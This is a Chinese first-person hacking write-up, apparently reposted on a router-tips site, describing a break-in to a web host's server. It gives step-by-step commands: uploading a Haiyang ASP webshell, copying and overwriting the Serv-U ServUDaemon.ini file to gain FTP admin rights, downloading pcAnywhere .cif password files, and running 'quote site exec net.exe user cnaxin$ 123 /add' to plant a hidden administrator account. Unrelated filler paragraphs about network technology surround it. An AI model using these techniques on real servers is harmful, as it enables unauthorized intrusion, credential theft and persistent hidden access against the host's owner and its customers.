争怎路由网:是一个主要分享无线路由器安装设置经验的网站,汇总WiFi常见问题的解决方法。

最近的一次渗透

时间:2024/2/23作者:未知来源:争怎路由网人气:

网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。

最近的一次渗透半夜2点多了,在和QQ上一个好友聊天,也不知道怎么的叫我测试他的空间商的服务器是不是安全,二话不说先发个 海阳木马上去

1,初战告捷

打开IE 输入 http://domain.com/mail.asp (mail.asp是我给木马改的名字),习惯的先输入密码,和我想的一样,服务器禁止了FSO!!没办法退回来,看看能不能浏览目录,c:\ 发送命令 ,good~~ 居然可以

C:\Documents and Settings-----0
C:\Inetpub-----0
C:\Program Files-----0
C:\WINNT-----0

C:\Inetpub 没删 看看scripts映射有没有删掉,http://ip/scripts,返回404,删掉了管理员还不错,但没有取消分区的everyone的所有权限让他的服务器受到致命的打击!

在ie 输入 ftp://ip 返回 serv-u 什么不能匿名登陆,不过这个已经够了,确认了他的ftp服务器段用的什么软件,找吧,一般serv-u会装在C:\Program Files ,C:\Program Files 发送命令 ,没有:(,d:\ 发送命令 看到D:\Program Files,肯定就在里面我心里想,果然看到了D:\Program Files\Serv-u,谢天谢地!接下来我需要获得ServUDaemon.ini这个文件,海阳木马提供了copy 功能
D:\Program Files\Serv-u\ServUDaemon.ini copy E:\www\我的朋友的目录\
发送命令
Great ~~ 显示 command completed success 成功
在ie 输入 http://domain.com/ServUDaemon.ini 把ServUDaemon.ini down下来了
接着把ServUDaemon.ini 拷贝到 本地机的serv-u里,(我的电脑上安装了serv-u,你如果没有安装一个,在肉鸡上下载文件也很方便),打开 serviadmin ,你就会看到 肉鸡上的ftp用户了,不过 这些用户的口令是加密!不管他我们要获得是管理员,添加一个用户,把他添加成管理员,保存!把这个新的ServUDaemon.ini 发给我朋友,叫他用ftp上传,覆盖掉原来web目录里的
ok~~接下来没他的事了!!:)

D:\Program Files\Serv-u\ServUDaemon.ini  move  E:\www\我的朋友的目录\bbs
command completed success
(注意:这里一定要先移除掉 ServUDaemon.ini 海阳木马不会自动覆盖)

D:\Program Files\Serv-u\ 看看ServUDaemon.ini 是不是移除了,确实没有了

E:\www\我的朋友的目录\ServUDaemon.ini   copy  D:\Program Files\Serv-u\

command completed success

到这里只要服务器重起,我们就获得了ftp的管理员权限,可以通过本地机的servu 远程连接 肉鸡上的 servu !渗透基本成功

2,意外的发现

弄了半天,我还没扫描过他的服务器,不要弄出什么弱口令什么的,前面做的可真是笑话!:) 当然扫描结果没有这些,却意外的发现了5631 5632 端口,呵呵~~直到是什么的吗?pcanywhere的,去吧pcanywhere的密码文件down 下来,用流光看密码^o^ ,一般pcanywhere的密码文件都是放在
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere  目录,PCA.*****.cif
这个文件就是了

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.23212.cif  copy  E:\www\我的朋友的目录\

http://domain.com/PCA.23212.cif

用流光读取了密码,顺利的连上了肉鸡,当然肉鸡是锁定的,不然可以直接装后门了!

但最大的收获,pcanywhere可以重起服务器,哈哈哈!我现在是ftp的管理员了
远程连上肉鸡的servu,创建了一个naxin的用户,添加了 主目录 指向d:\www 并添加c d e f 分区的映射,全部权限!现在我控制着服务器的生杀大权,虽然不是系统管理员,但可以通过ftp删除文件,嘎嘎嘎~~ 然而我发现ftp只能用port模式连接,在后面的渗透埋下了阴影

3,最后的胜利

入侵者有着强烈的控制欲,我当然不会甘心只得到ftp的管理员,我要的是系统管理员!

用过serv-u的应该看到有个执行权限吧!嗬嗬用它就可以来添加管理员,具体命令

shell>ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (ip:(none)): id
331 User name okay, please send complete E-mail address as password.
Password:password
230 User logged in, proceed.
ftp> cd winnt
250 Directory changed to /WINNT
ftp>cd system32
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user cnaxin$ 123 /add
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators cnaxin$ /add

哈哈哈!完成了!!

网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。



关键词:最近的一次渗透




Copyright © 2012-2018 争怎路由网(http://www.zhengzen.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版